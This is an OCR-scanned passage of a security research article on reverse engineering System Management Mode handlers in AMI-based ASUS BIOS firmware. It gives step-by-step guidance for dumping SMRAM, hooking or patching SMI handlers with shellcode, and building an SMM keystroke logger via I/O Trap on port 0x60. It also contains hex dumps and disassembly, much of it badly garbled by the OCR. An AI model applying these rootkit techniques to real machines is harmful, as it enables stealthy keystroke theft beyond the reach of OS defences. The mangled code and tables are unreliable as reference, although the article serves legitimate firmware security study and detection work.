SMM malware as well as security of SMI code in (U)EFI firmware was 
discussed in [efi_hack]. SMM keylogger was first introduced by Sherri 
Sparks and Shawn Embleton at Black Hat USA 2008 [smm_rkt] but very little 
details were provided by the authors regarding how SMI code works, how one 
could hook it and more importantly how would anyone detect such malware. 


We use a different technique to enable keystroke logging in SMM than was 
used by [smm_rkt]. We utilize I/O Trap mechanism provided by modern 
chipsets instead of I/O APIC. 


We strongly believe that to effectively combat SMM malware in the future 
we need to learn internals of SMM firmware which is a primary motivation 
for writing this article. Until then SMM security will be in a state of 
hysteria. In the paper we also describe some methods to detect the 
presence of SMI keystroke logger. 


We do not disclose any vulnerability that would allow injecting malicious 
payload into SMM. The first known SMM exploit was disclosed in [smm], 
another exploit was disclosed in [xen_Own] (*). Both of them exploited 
insecure hardware configuration programmed by the BIOS system firmware 
that also contains SMI handlers. Thus far, very little research is 
available in the internals of SMI handlers. We believe this is due to 
complexity of their debugging and revers ngineering. This work is 
designed to close this gap regardless of specific vulnerabilities that may 
be used to inject malicious code into SMM. 


It should be noted that this work only explores SMI code in the BIOS of 
ASUS motherboards, specifically in ASUS P5Q based on Intel P45 hardware. 
ASUS implements BIOS based on AMIBIOS 8 therefore most of the results of 
this work apply to other motherboard manufacturers that use BIOS firmware 
based on AMI BIOS. Many results are also applicable to motherboards that 
use other BIOS cores because of similarities in implementation of SMI 
handlers in different BIOS firmware. SMM is a x86 feature common for all 
motherboards which also leads to a similar SMI firmware design across 
different BIOS firmware implementations. 


(*) While writing this article authors learned about another vulnerability 
discovered in CPU SMRAM caching design [smm_cache]. 


5 


-—-[ 2 -— REVERSE ENGINEERING SYSTEM MANAGEMENT INTERRUPT (SMI) HANDLERS 


= fi P22 Brief Overview of BIOS Firmware 


The first instruction fetched by CPU after reset is located at OxFFFFFFFO 
address and is mapped to BIOS firmware ROM. This instruction is referred to 
as "reset vector". Reset vector is typically a jump to the first bootstrap 
code, BIOS boot block. Boot block code and reset vector are physically 
residing in BIOS ROM. Access to BIOS ROM is slow compared to DRAM and BIOS 
firmware cannot use writable memory such as stack when executing from ROM 
or flash. 


For these reasons BIOS boot block code copies the rest of system BIOS code 
from ROM into DRAM. This process is known as "BIOS shadowing". Shadowed 
system BIOS code and data segments reside in lower DRAM regions below 1MB. 
Main system BIOS code is located in memory ranges OxEO000 - OXxEFFFF or 
OxFOO000 —- OXxFFFFF. 


BIOS firmware includes not only boot-time code but also firmware that will 
be executing at run-time "in parallel" to the Operating System but in it’s 
own "orthogonal" SMRAM memory reserved from the OS. This run-time firmware 
consists of System Management Interrupt (SMI) handlers that execute in 
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System Management Mode (SMM) of a CPU. 


--[ 2.2 - Overview of System Management Mode (SMM) 


Processor switches to System Management Mode (SMM) from protected or 
real-address mode upon receiving System Management Interrupt (SMI) from 
various internal or external devices or generated by software. In response 
to SMI it executes special SMI handler located in System Management RAM 
(SMRAM) region reserved by the BIOS from Operating System for various SMI 
handlers. SMRAM is consisting of several regions contiguous in physical 
memory: compatibility segment (CSEG) fixed to addresses O0xA0000 - OXxBFFFF 
below 1MB or top segment (TSEG) that can reside anywhere in the physical 
memory. 


If CPU accesses CSEG while not in SMM mode (regular protected mode code), 
memory controller forwards the access to video memory instead of DRAM. 
Similarly, non-SMM access to TSEG memory is not allowed by the hardware. 
Consequently, access to SMRAM regions is allowed only while processor is 
executing code in SMM mode. At boot time, system BIOS firmware initializes 
SMRAM, decompresses SMI handlers stored in BIOS ROM and copies them to 
SMRAM. BIOS firmware then should "lock" SMRAM to enable its protection 
guaranteed by chipset so that SMI handlers cannot be modified by the OS or 
any other code from this point on. 


Upon receiving SMI CPU starts fetching SMI handler instructions from SMRAM 
in big real mode with predefined CPU state. Shortly after that, SMI code 

in modern systems initializes and loads Global Descriptor Table (GDT) and 
transitions CPU to protected mode without paging. SMI handlers can access 
4 
e 


GB of physical memory. Operating System execution is suspended for the 
ntire time SMI handler is executing till it resumes to protected mode and 
restarts OS execution from the point it was interrupted by SMI. 


Default treatment of SMI and SMM code by the processor that supports 
virtual machine extensions (for example, Intel VMX) is to leave virtual 
machine mode upon receiving SMI for th ntire time SMI handler is 
executing [intel_man]. Nothing can cause CPU to exit to virtual machine 
root (host) mode when in SMM, meaning that Virtual Machine Monitor (VMM) 
does not control/virtualize SMI handlers. 


Quite obviously that SMM represents an isolated and "privileged" 
environment and is a target for malware/rootkits. Once malicious code is 
injected into SMRAM, no OS kernel or VMM based anti-virus software can 
protect the system nor can they remove it from SMRAM. 


It should be noted that the first study of SMM based rootkits was provided 
in the paper [smm] followed by [phrack_smm] and a proof of concept 
implementation of SMM based keylogger and network backdoor in [smm_rkt]. 


--[ 2.3 - Extracting binary of BIOS SMI Handlers 


There seems to be a common misunderstanding that some "hardware analyzer" 
is required to disassemble SMI handlers. No, it is not. SMI handlers is a 
part of BIOS system firmware and can be disassembled similarly to any BIOS 
code. For detailed information on reversing Award and AMI BIOS, interested 
reader should read this excellent book and series of articles by Pinczakko 
[bios_disasm]. 


There are two easy ways to dump SMI handlers on a system: 


1. Use any vulnerability to directly access SMRAM from protected mode and 
dump all contents of SMRAM region used by the BIOS (TSEG, High SMRAM or 
legacy SMRAM region at OxAQQQO-OxBFFFF). For instance, if BIOS doesn’t 
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lock SMRAM by setting D_LCK bit then SMRAM can be dumped after 
modifying SMRAMC PCI configuration register as explained in [smm] and 
[phrack_smm]. 


If you are unfortunate and BIOS locks SMRAM and there are no other flaw 
to use then BIOS firmware can be modified such that it doesn’t set D_LCK 
any more. After re-flashing modified BIOS ROM binary back and booting the 
system from this BIOS, SMRAM will not be locked and can be dumped from 
the OS. This, surely, works only if BIOS firmware isn’t digitally signed. 
Oh, we forgot that almost no motherboards use digitally signed non-EFI 
BIOS firmware. 


Here’s a hint how to find where BIOS firmware sets D_LCK bit. BIOS 
firmware is most likely using legacy I/O access to PCI configuration 
registers using O0xCF8/0xCFC ports. To access SMRAMC register BIOS 
should first write value 0x8000009C to OxCF8 address port and then a 
needed value (typically, OxlA to lock SMRAM) to OxCFC data port. 


2. There’s another, probably simpler, way to disassemble SMI handlers, that 
doesn’t require access to SMRAM at run-time. 


2.1. Dump BIOS firmware binary from BIOS ROM using Flash programmer or 
simply download the latest BIOS binary from vendor’s web site ;). For 
ASUS P5Q motherboard download P5Q-ASUS-PRO-1613.ROM file. 


2.2. Most of the BIOS firmware including Main BIOS module which 
contains SMI handlers is compressed. Use tools provided by vendor to 
extract/decompress the Main BIOS module. ASUS BIOS is based on AMI BIOS 
so we used AMIBIOS BIOS Module Manipulation Utility, MMTool.exe, to 
extract the Main BIOS module. Open downloaded .ROM file in MMTool, 
choose to extract "Single Link Arch BIOS" module (ID=1Bh), check "In 
uncompressed form" option and save it. This is uncompressed Main BIOS 
module containing SMI handlers. 


Check out a resource on modifying AMI BIOS on The Rebels Heaven forum 
[ami_mod]. 


2.3. Once the Main BIOS module is extracted you can start disassembling 
it to find SMI handlers (for example, using HIEW or IDA Pro). In this 
paper we hope to provide a starting point for analyzing SMI handlers. 


So let’s jump to disassembling SMI handlers firmware. 


--[ 2.4 - Disassembling SMI Handlers 


We noticed that ASUS/AMI BIOS uses an array of structures describing 
supported SMI handlers. Each entry in the array starts with signature 
"SSMIxx" where last two characters ’xx’ identify specific SMI handler. 


5 


Here is SMI dispatch table used by AMIBIOS 8 in ASUS P5Q SE motherboard 
based on Intel’s P45 desktop chipset: 


O00065CBO: O00 24 53 4D-49 43 41 00-00 70 B4 00-40 BF O07 O00 SSMICA p_ @. 

O00065CCO: 40 20 6E C8-A8 4B 6E C8-A8 24 53 4D-49 53 53 00 @ n..Kn..SSMISS 
00065CD0: OO Bl B4 00-40 B4 B4 00-40 91 85 C8-A8 B5 85 C8 $2 OBS wets 
OOO65CEO: A8 24 53 4D-49 50 41 00-00 A8 87 C8-A8 BY 87 C8 .SSMIPA te. .t 
OOO65CFO: A8 B4 88 C8-A8 1C 89 C8-A8 24 53 4D-49 53 49 00 __.. %..$SMISI 
00065D00: O00 BS B4 00-40 C7 B4 00-40 63 9F C8-A8 7B 9F C8 ge Wig = NCC 6s fee 
00065D10: A8 24 53 4D-49 58 35 00-00 35 DE 00-40 38 DE 00 .SSMIX5 5. @8. 
00065D20: 40 BE 9F C8-A8 D2 9F C8-A8 24 53 4D-49 42 50 00 @_..._..SSMIBP 
00065D30: O00 E4 EO 00-40 F6 EO 00-40 5A A6 C8-A8B 80 Ab C8 pare Chenoa Chr cree 

O00065D40: A8 24 53 4D-49 53 53 00-00 01 El 00-40 14 El 00 .SSMISS - @ . 
00065D50: 40 AO A6 C8-A8 C6 A6 C8-A8 24 53 4D-49 45 44 00 @........SSMIED 
00065D60: O00 8D E3 00-40 90 E3 00-40 DF A7 C8-A8 F2 A7 C8 Ging UC tines 
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00065D70: A8 24 
00065D80: 40 41 
00065D90: 00 29 
OOO65DA0: A8 24 
OO065DB0: 40 DO 
O0065DCO: O00 A3 
OOO065DD0: A8 24 
OOO065DEO: 40 CC 
OOO65DFO: OO AB 
OO0065EO0: A8 24 
O0065E10: 40 9C 


53 
A8 
E8 
3.3 
AA 
E8 
53 
AC 
E8 
44 
B3 


53 
A8 
E8 
53 
AB 
E8 
53 
AC 


E8 


4D-49 46 
C8-A8 53 
00-40 39 
4D-49 42 
C8-A8 12 
00-40 A6 
4D-49 4F 
C8-A8 E7 
00-40 AE 
45-46 FF 

C8-A8 A7 


00 
B3 
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00-00 
C8-A8 
00-40 
00-00 
C8-A8 
00-40 
00-00 
C8-A8 
00-40 
01-00 
C8-A8 


91 
24 
21 
55 
24 
CD 
A7 
24 
F7 
AF 
53 


E3 
53 
AA 
E8 
53 
AB 
E8 
53 
AC 
E8 
23 


BPOQPRPOOQNBRONRKRO Ww 
HBS: 2 OO EI 00 GI © COS “OS: 
| 


OS PR DD RW DOs 


94 
50 
33 
58 
56 
DD 
AA 
42 
FB 
B2 
13 


EFOMAWDOAWOAW OO 


E3 
54 
AA 
E8 
44 
AB 
E8 
4F 
AC 
E8 
06 


00 
00 
C8 
00 
00 
C8 
00 
00 
C8 
00 
00 


). @9. @! 3 

SSMIBS U. @X 
@ <..SSMIV 

3 Cx 2 @eX< 

SSMIOS . @ 
Coes ioc Baw SSMIB 

<. @R. @ 

SDEF ee, 1@. 
@ SSDT 


Another example, SMI dispatch table on ASUS B50A laptop with Intel mobile 


GM45 express and I 


00-92 6D EA 47-9B 6D EA 
A8-24 53 4D 49-54 43 00 
A8-3A 7E 66 A8-5F 7E 66 
OO0-BO 89 EA 47-E9 08 EA 
A8-24 53 4D 49-53 53 00 
47-B8 95 66 A8-D1 95 66 
OO-E4 18 32 5E-F6 18 32 
A8-24 53 4D 49-58 35 00 
47-92 9B 66 A8-A6 9B 66 
00-96 A7 EA 47-A5 A7 EA 
A8-24 53 4D 49-42 50 00 
47-79 A3 66 A8-9F A3 66 
00-49 AA EA 47-4C AA EA 
A8-24 53 4D 49-46 53 00 
47-72 A4 66 A8-84 A4 66 
OO-El B7 EA 47-F1 B7 EA 
A8-24 53 4D 49-42 53 00 
47-CO A6 66 A8-4D A7 66 
OO-FF B7 EA 47-02 B8 EA 
A8-24 53 4D 49-43 4D 00 
A8-EF AD 66 A8-F1 AD 66 
00-91 AE 66 A8-94 AE 66 
A8-24 53 4D 49-41 42 00 
A8-54 BO 66 A8-67 BO 66 
OO-FO BB 66 A8-F3 BB 66 
A8-24 53 4D 49-50 53 00 
A8-33 BC 66 A8-41 BC 66 
00-74 BC 66 A8-7A BC 66 
A8-24 53 4D 49-47 44 00 
A8-C4 BD 66 A8-F6 BD 66 
00-50 BF 66 A8-62 BF 66 
A8-24 53 4D 49-46 45 00 
47-17 C4 66 A8-0C D9 66 
00-50 D9 66 A8-55 DY 66 
A8-24 53 4D 49-43 47 00 
A8-EB DA 66 A8-17 DB 66 
00-84 E3 EA 47-87 E3 EA 
A8-00 00 00 01-00 00 00 


-ROM file for any ASUS 


OOO7BE90: 24 53 4D 49-54 44 00 
OOO7BEAO: 10 6B 66 A8-11 6B 66 
OOO7BEBO: 30 7E 66 A8-39 7E 66 
OOO7BECO: 24 53 4D 49-43 41 00 
QOOO7BEDO: 70 81 66 A8-9B 81 66 
OOO7BEEO: Fl 89 EA 47-F4 89 EA 
OOO7BEFO: 24 53 4D 49-53 49 00 
OOO7BFO0O: 96 97 66 A8-B4 97 66 
OOO7BF10: 49 A5 EA 47-4C A5 EA 
OOO7BF20: 24 53 4D 49-42 4E 00 
OOO7BF30: 9F Al 66 A8-B7 Al 66 
OOO7BF40: A6 A7 EA 47-Bl1 A7 EA 
OOO7BF50: 24 53 4D 49-45 44 00 
OOO7BF60: 10 A4 66 A8-23 A4 66 
OOO7BF70: 4D AA EBA 47-50 AA EA 
OOO7BF80: 24 53 4D 49-50 54 00 
OOO7BF90: OC A6 66 A8-1E A6 66 
OOO7BFAO: F2 B7 EA 47-FE B7 EA 
OOO7BFBO: 24 53 4D 49-42 4F 00 
OOO7BFCO: O08 A8 66 A8—-OC A8 66 
OOO7BFDO: 5D AD 66 A8-60 AD 66 
OOO7BFEO: 24 53 4D 49-4C 55 00 
OOO7BFFO: A8 AE 66 A8-B5 AE 66 
0007C000: 4D BO 66 A8-50 BO 66 
0007C010: 24 53 4D 49-47 43 00 
0007C020: F4 BB 66 A8-OA BC 66 
0007C030: 2C BC 66 A8-32 BC 66 
0007C040: 24 53 4D 49-50 53 00 
0007C050: 7B BC 66 A8-86 BC 66 
0007C060: CO BD 66 A8-C3 BD 66 
0007CO70: 24 53 4D 49-43 45 00 
0007CO080: 72 BF 66 A8-8B BF 66 
0007C090: 70 D3 EA 47-7F D3 EA 
OOO7COAO: 24 53 4D 49-49 4C 00 
OOO07COBO: 5B D9 66 A8-61 DY 66 
0007COCO: BO DA 66 A8-B6 DA 66 
OOO07CODO: 24 44 45 46-FF 00 O1 
OOO7COEO: 86 E9 66 A8-91 EY 66 
As a small exercise, download 
find which SMI handl 


Both tables have t 


he 


rs are present in the 


last structure with 


From the above tabl 


entry: 


_smi_handler STRUCT 


signature 
some_flags 


Ss 


"SD 
default SMI handler invoked when none of ot 
of current SMI. It does nothing more than simply clearing all 


EE’ 


47 
00 
A8 


aon~7woowAswono 


K POs POR PO 


~] 


CH9IM chipset looks similar but has more SMI handlers: 


SSMITD ‘’m.G>m. 


kf. k£.SSMITC 
OF POF fie OES 
SSMICA .%.G. 
p_f.>_f.SSMISS 
$.G.%.G..f£ 
SSMISI De 
--f._-f£.SSMIX5 
Ts (GT asG! Sf. 
SSMIBN -..G_ 
_.f...£.SSMIBP 
Gt..Gy_f.__ 
SSMIED I..GL 
3 f£.SSMIFS 
M..GP..Gr.f." 
SSMIPT e'G's 
f f£.SSMIBS 
1Ge o¢ Gu wticM 
SSMIBO iG 
f £.$SSMICM 
)-f.°-£ E 
SSMILU ‘’RE."R 
Rf£..R£.SSMIAB 
Met Pf, Tet sg 
SSMIGC Shonl> 
>f £.SSMIPS 


| 

n 

+ 

n 
wn ct 
n 

2 
ie 
Q 

UO 


EeePC netbook and 
EeePC BIOS. 


Signature which describes 


her handlers claimed ownership 


SMI statuses. 


we can try to reconstruct contents of each table 


BYTE 
WORD 


'SSMI’,? 


G 
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some_ptr0 DWORD ? 
some_ptrl DWORD ? 
some_ptr2 DWORD ? 
handle_smi_ptr DWORD 2 


_smi_handler ENDS 


Each SMI handler entry in SMI dispatch table starts with signature ’SSMI’ 
followed by 2 characters specific to SMI handler. Only entry for the 
default SMI handler starts with ’SDEF’ signature. 


Each _smi_handler entry contains several pointers to SMI handler functions. 
The most important pointer occupies last 4 bytes, handle_smi_ptr. It points 
to the main handling function of the corresponding SMI handler. 


--[ 2.5 - Disassembling "main" SMI dispatching function 


A special SMI dispatch routine (let’s name it "dispatch_smi") iterates 
through each SMI handler entry in the table and invokes its handle_smi_ptr. 
If none of the registered SMI handlers claimed ownership of the current SMI 
it invokes handle_smi_ptr routine of $DEF handler. 


Below is a disassembly of Handle_SMI BIOS function in ASUS P5Q motherboard: 


OOO4AF71: 51 push cx 

OOO4AF72: 50 push ax 

OOO4AF73: 53 push bx 

OOO4AF74: 1E push ds 

OOO4AF75: 06 push es 

OO04AF76: 9A0101C8A8 call OA8C8:00101 ---X 
OOO4AF7B: O7 pop es 

OOO4AF7C: 1F pop ds 

OO04AF7D: C606670300 mov b, [0367] ,000 
OO04AF82: 803E670301 cmp b, [0367],001 ;" " 
; je _done_handling_smi 

OO04AF87: 7438 je OOOO4AFC1 ---> (1) 


7 
; load CX with number of supported SMI handlers 
; done handling SMI if 0 


OOO4AF89: 8BOE6003 mov cx, [0360] 
; yjcxz _done_handling_smi 
OOO4AF8D: E332 JCXZ OOOO4AFC1 ---> (2) 


_iterate_thru_handlers: 


7 
; load GS with index of SMI handler table segment in GDT 
; and decrement number of SMI handlers to try 


OOO4AF8F: 6828B4 push OB428 ;"_(" 
OOO4AF92: OFA pop gs 
OOO4AF94: 33FF xor di,di 


, 
; handle next SMI 
, 


_handle_next_smi: 


OOO4AF96: 49 dec Cx 


rs 


; check some_flags from current _smi_handler entry in the table 
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OOO4AF97: 658B4506 mov 
OOO4AF9B: 83E001 and 
OOO04AF9E: 7413 je 
OOO4AFA0: 51 push 
OOO4AFA1: OFA8 push 
OOO4AFA3: 57 push 


; call SMI handler, 


handle_smi_ptr of the current 


; _smi_handler entry in the dispatch table 


OOO4AFA4: 


65FF5D14 
OOO4AFA8: 5F 
OOO4AFA9: OFAY 
OOO4AFAB: 59 


; jcxz _done_handling_smi 


OOO4AFAC: E3 
OOO4AFAE: 83 
OOO4AFB1: 74 
OOO4AFB3: BB 
OOO4AFB6: 03 


’ 


13 
F800 
07 
1800 
FB 


; try next SMI handler entry 


OOO4AFB8: EB 
OOO4AFBA: B8 
OOO4AFBD: OB 
OOO4AFBF: 75 


DC 


0000 
CO 
C1 


call 


pop 
pop 
pop 


JCxXz 
cmp 
je 
mov 
add 


jmps 


mov 
or 
jne 


ax,gs: [di] [06] 
ax; 0.0L 2% © 
OOO0Q04AFB3 ---> 
Cx 


gs 
di 


d,gs: [di] [14] 


di 
gs 
cx 


OOOO4AFC1 
ax, 000 
OOOO4AFBA ---> 
bx,00018 ;" " 
di,bx 


---> 


OOOO04AF96 ---> 
; _handle_n 


ax, 00000 
ax,ax 


OOOO4AF82 ---> 


; SMI either handled or corresponding handler was not found 


; and default handler executed 


_done_handling_smi: 


OOO4AFC1: 5B 
OOO4AFC2: 58 
OOO4AFC3: 59 
OOO4AFC4: 5F 
OOO4AFC5: OFAY 
OOO4AFC7: CB 


=a 


Based on th 


abov 


2.6 — Hooking SMI handlers 


pop 
pop 
pop 
pop 
pop 
retf 


rootkit funct 
SMI handlers. 


ional 


, ther 
lity: 


ar 


Whil 


consider both of them. 


(6) 
ext_smi 


(7) 


several ways to hook SMI handlers to adda 
add a new SMI handler or patch one of the existing 
le these two methods aren’t significantly different, 


we 


1. Adding your own SMI handler and a new entry to SMI dispatch table. 


To add a new SMI handler we have to add a new entry to SMI dispatch table. 
Let’s add entry with signature ’ 


for the default SMI handler SD 


O0065E00: 
OO0065E10: 


GJ 


A8 24 53 4D-49 61 61 00-00 AF 
40 9C B3 C8-A8 A7 B3 C8-A8 53 53 44-54 13 06 00 @_ 


E8 00-40 B2 


E8 00 .SSMIa 


SMIaa’ to the table just before the entry 
F: 


a .. @ 


-_--SSDT 
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This entry contains pointers to default SMI handler functions that may be 
patched. Another method is to find a free space in SMRAM, put shellcode 
there and replace pointers to default SMI handler functions with pointers 
to SMI shellcode. 


Additionally, SMI code saves number of active SMI handlers into a variable 
in SMRAM data segment that also should be incremented if a new SMI handler 
is injected. 


2. Patching one of the existing SMI handlers. 


Let’s describe patching existing SMI handler in more details. 


Although all BIOS we analyzed are based on the same AMIBIOS 8 core, we 
found that number of S$SMI entries in SMI handler tables vary depending on 
motherboard manufacturer and model, chipset manufacturer and model, and 
even on whether it’s mobile or server motherboard. SMI handlers typically 
serve as hardware management functions or workaround for hardware bugs. 
Different systems have different needs and therefore different types of 
SMI handlers are present in the BIOS firmware. 


Interestingly, some of SMI handlers appear to exist in all BIOS based on 
AMIBIOS 8. Specifically handlers with the following entries in SMI 
dispatch table: SSMICA, SSMISS, SSMISI, $SMIX5, SSMIBP, $SMIED, SSMIFS, 
SSMIBS and obviously S$DEF. 


The first choice would be to replace one of the SMI handlers present in 
every BIOS based on AMIBIOS 8 core, such as SSMISS. BIOS for ASUS P5Q 
motherboard has SSMISS handler at 000490D3 offset of system BIOS code. 
Below is a snippet of S$SMISS handler disassembly: 


handle_smi_ss: 


000490D3: OF push cs 
000490D4: E8D8FF call OOOO490AF --- (1) 
000490D7: B80100 mov ax,Q00001 ;" "™ 
O00490DA: OF82F400 jb 0000491D2 --- (2) 
O00490DE: B81034 mov ax,03410 ;"4 " 
000491CA: 9AFBOOC8A8 call OA8C8:000FB ---X 
000491CF: B80000 mov ax, 00000 
000491D2: CB retf 

After some time spent on revers ngineering this handler one should be 


able to recognize it as a code handling Sleep State requests. It turns out 
that replacing one of the existing SMI handlers may leave the system 
without important functionality or even make the system unstable. 


Replacing default SMI handler (SDEF) may be possible if injected payload 
is designed to handle an SMI that isn’t supported by the current BIOS. In 
this case no existing SMI handler will claim the SMI and default handler 
will be executed. 


Default handler is very basic and has very limited space so it may be 
better to find another victim handler that has more space, present in SMM 
of all BIOS firmware and doesn’t implement useful functionality. 


Sounds impossible but.. ;) Let’s take a look at the SMI handler with 
signature SSMIED. This SMI handler handles software SMI generated by 


= 


writing O0xDE value to APMC port OxB2: 


_outpd( Oxb2, OxDE ); 


It doesn’t seem to do anything meaningful but it exists and is the same in 
every BIOS w xamined. The purpose of this SMI handler is not entirely 
clear. It seems to be used for debugging. 
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First of all, we need to find SSMIED handler routines in BIOS binary. SMI 
handlers are trivial to locate, if main routine is found for at least one 
SMI handler in the BIOS binary (remember handle_smi_ptr pointer in 
SMI_HANDLER structure). 


Assume we know location of handle_smi_ss function of SSMISS SMI handler 
described above. This location is offset 0x000490D3 in the system BIOS 
binary. 


The last 4 bytes of SSMISS entry in SMI dispatch table are "B5 85 C8 A8" 
which makes handle_smi_ptr = OxA8C885B5. This is a linear address of the 
main function of SSMISS handler. The last 4 bytes of $SMIED entry in SMI 
dispatch table are "F2 A7 C8 A8" hence the handle_smi_ptr = OxA8C8A7F2. 


This is a linear address of the main function of $SMIED handler. Delta 
between these two linear addresses is 0x223D. By adding this delta to the 
offset of SSMISS SMI handler in the BIOS binary, one can calculate the 
offset of main function of $SMIED or any other SMI handler in the BIOS 
binary. 


0x000490D3 + 0x223D = 0x0004B310 


Any other SMI handler can be used instead of SSMISS, for example SDEF SMI 
handler which should be the same in all BIOS binaries. 


Here’s the main function of $SMIED SMI handler: 


OOO4B2FD: 50 push ax 

OOO04B2FE: E8CCFD call OO0O004B0CD --- > (1) 
0004B301: 720A jb 00004B30D --- > (2) 
0004B303: 3CDE cmp al,ODE 

0004B305: 7506 jne 00004B30D --- > (3) 
0004B307: E8EOFD call OOO04BOBRA --- > (4) 
O004B30A: F8 cle 

OO004B30B: 58 pop ax 

0004B30C: CB retf 

0004B30D: F9 stc 

OOO4B30E: 58 pop ax 

OOO04B30F: CB retf 


handle_smi_ed: 


0004B310: OF push cs 

0004B311: ES8E9FE call O0004B2FD --- > (5) 
0004B314: B80100 mov ax,00001 ;" "™ 
0004B317: 7245 jb 00004B35E --- > (6) 
0004B319: 6660 pushad 

0004B31B: 1E push ds 

OO004B31C: 06 push es 

0004B31D: 680070 push 07000 ;"p " 
0004B320: 1F pop ds 

0004B321: 33FF XOr di,di 

0004B323: 6828B4 push OB428 ;"_(" 
0004B326: O7 pop es 

0004B327: 33F6 xor si,si 

0004B329: 268B04 mov ax,es: [si] 

0004B32C: 8905 mov [di],ax 

O0004B32E: 268B04 mov ax,es: [sil] 

0004B331: 3D2444 cmp ax,04424 ;"ps" 
0004B334: 750C jne 00004B342 --- > (7) 
0004B336: BBO200 mov bx,00002 ;" " 
0004B339: 268B4402 mov ax,es: [si] [02] 
0004B33D: 3D4546 cmp ax,04645 ;"FE" 
0004B340: 7408 je O00004B34A --- > (8) 
0004B342: 83C602 add St O02. aS 
0004B345: 83C702 add ai 002) 70° 8 
0004B348: EBDF jmps 00004B329 --- > (9) 
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O004B34A: 268B00 mov ax,es: [bx] [si] 
O0004B34D: 8901 mov [bx] [di],ax 
O004B34F: 83C302 add bx 7002) 2 
0004B352: 83FBOA cmp bx,00A ;" " 
0004B355: 75F3 jne 00004B34A --- > (A) 
0004B357: O07 pop es 

0004B358: 1F pop ds 

0004B359: 6661 popad 

0004B35B: B80000 mov ax, 00000 

O0004B35E: CB retf 


The only thing above "debug" SMI handler does is it simply copies the 
entire SMI dispatch table from 0x0B428:[si] to 0x07000: [di]. 


So it seems logical and safe to patch this handler routine with our own 
SMI shellcode. The SMI shellcode may be different depending on the 
purpose. We inject SMI keystroke logger similarly to [smm_rkt]. 


Before we jump to details of SMI keystroke logger handler implementation 
let’s discuss methods tha can be used to invoke this SMI keylogger handler 
when keys are pressed on a keyboard. 


1. Routing keyboard hardware interrupt (IRQ #01) to SMI using I/O APIC 


Authors of [smm_rkt] used I/O Advanced Programmable Interrupt Controller 
(I/O APIC) to redirect keyboard controller hardware interrupt IRQ #01 to 
SMI and capture keystrokes inside hooked SMI handler. 


For details of using this method please refer to [smm_rkt]. For details 

on I/O and Local APIC programming, please refer to Chapter 8 of Intel (r) 
IA-32 Architecture Software Developer’s Manual [intel_man] or search for 
"APIC programming". 


2. I/O Trap on access to keyboard controller data port 0x60 


We initially started to use entirely different technique to intercept 
pressed keys in SMI - I/O Trap. It should be noted that this method is 
traditionally used in the BIOS to emulate legacy PS/2 keyboard. Let’s 
describe this method in greater details in the next section. 


--[{ 3 -— SMM KEYLOGGER 


--[ 3.1 - Hardware I/O Trap mechanism 


One of the ways to implement OS kernel keystroke logger is to hook debug 
trap handler #DB in Interrupt Descriptor Table (IDT) and program hardware 
debug registers DRO-DR3 to trap on access to keyboard controller data port 
Ox60. 


There has to be similar way to trap into SMI upon access to keyboard I/O 
ports. And, miraculously, there is one - I/O ports 60/64 emulation for the 
USB keyboard. For instance, let’s consult to whitepaper describing USB 
support for AMI BIOS [ami_usb]. There we can find the following quote: 


[snip] 


2.5.4 Port 64/60 Emulation 

This option enables/disables the "Port 60h/64h" trapping option. Port 
60h/64h trapping allows the BIOS to provide full PS/2 based legacy support 
for the USB keyboard and mouse. This option is useful for Microsoft 
Windows NT Operating System and for multi-language keyboards. Also this 
option provides the PS/2 functionalities like keyboard lock, password 
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setting, scan code selection etc to USB keyboards. 
[/snip] 


So to use it for "other" purposes we need to understand what mechanism 

this feature is built upon. The mechanism should be supported by hardware 
so we need to search CPU and chipset specifications. The underlying 
mechanism is supported by both Intel and AMD processors and is referred to 
as "I/O Trap". AMD manual has a section "SMM I/O Trap and I/O Restart" 
[amd_man]. Intel manual describes it in sections "I/O State Implementation" 
and "I/O INSTRUCTION RESTART" [intel_man]. 


I/O Trap feature allows SMI trapping on access to any I/O port using IN or 
OUT instructions and executing specific SMI handler. Reasoning behind this 
feature is to power on some device being accessed via some I/O port if 
it’s powered off. Apparently, I/O Trap is also used for other features 
like emulating 60h/64h keyboard ports in SMI handler for the USB keyboard. 


So I/O Trap method is similar to debug trap mentioned above, it traps on 
access to I/O ports, but instead of invoking debug trap handler in OS 
kernel, it generates an SMI interrupt and CPU enters SMM and executes I/0 
Trap SMI handler. 


When processor traps I/O instruction and enters SMM mode, it saves all 
information about trapped I/O instruction in SMM Save State Map in the 
field "I/O State Field" at 0x8000 + Ox7FA4 offset from SMBASE. Below we 
provide contents of this field that our keylogger will later need to check: 


I/O State Field (SMBASE + 0x8000 + Ox7FA4): 


31 16 15 8 7 4 3 1 0 


I/O Port Reserved I/O Type I/O Length IO_SMI 


- If set, IO_SMI (bit 0) indicates that this is a I/O Trap SMI. 

- I/O Length (bits [1:3]) indicates if I/O access was byte (001b), word 
(0106) or dword (100b). 

- I/O Type (bits [4:7]) indicate type of I/O instruction, "IN imm" 
(1001lb), "IN DX" (0001b), etc. 

- I/O Port (bits [16:31]) contain I/O port number that has been accessed. 


As we will see in the next section, SMI keylogger will need to update 
saved EAX field in SMM Save State Map if this is IO_SMI, access to port 
0x60 is byte-wide and done via IN DX instruction. Specifically, SMI 
keylogger checks if I/O State field at Ox7FA4 offset has value 0x00600013: 


mov esi, SMBASE 
mov ecx, dword ptr fs:[esi + OxFFA4] 
cmp ecx, 0x00600013 

jnz _not_io_smi 


Above check is simplified. SMI keylogger has to check other values of I/O 
Type and I/O Length bits in I/O State Field. 


(*) Remark: for a keylogger purposes, we are only interested in I/O Trap, 
but not in I/O Restart. For the sake of completeness, I/O Restart allows 
IN or OUT instruction, that was interrupted by SMI, to be re-executed 

(or “restarted") after resuming from SMM mode. 


It is possible to program I/O Trap on read or write to any I/O port which 
allows anyone to implement SMI handlers that will be invoked on variety of 
interactions between software and hardware devices. We are currently 
interested in trapping read access to keyboard controller data port 0x60. 
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Let’s describe details of how I/O trapping of key pressed on a keyboard 
works: 


1. When key is pressed, keyboard controller signals a hardware interrupt 
[..Here redirection of IRQ 1 to SMI by I/O APIC would take place..] 


2. After receiving hardware keyboard interrupt, APIC invokes keyboard 
interrupt handler routine in IDT (0x93 for PS/2 keyboard) 


3. At some point keyboard interrupt handler needs to read a scan code from 
keyboard controller buffer using data port 0x60 


[..In a clean system keyboard interrupt handler would decode scan code and 
display it on a screen or handle it normally, but in the hooked system..] 


4. Chipset traps read to port 0x60 and signals an I/O Trap SMI 


5. In SMM, keystroke logger SMI handler claims ownership of and handles 
this I/O Trap SMI 


6. Upon exit from SMM, keystroke logger SMI handler returns result of port 
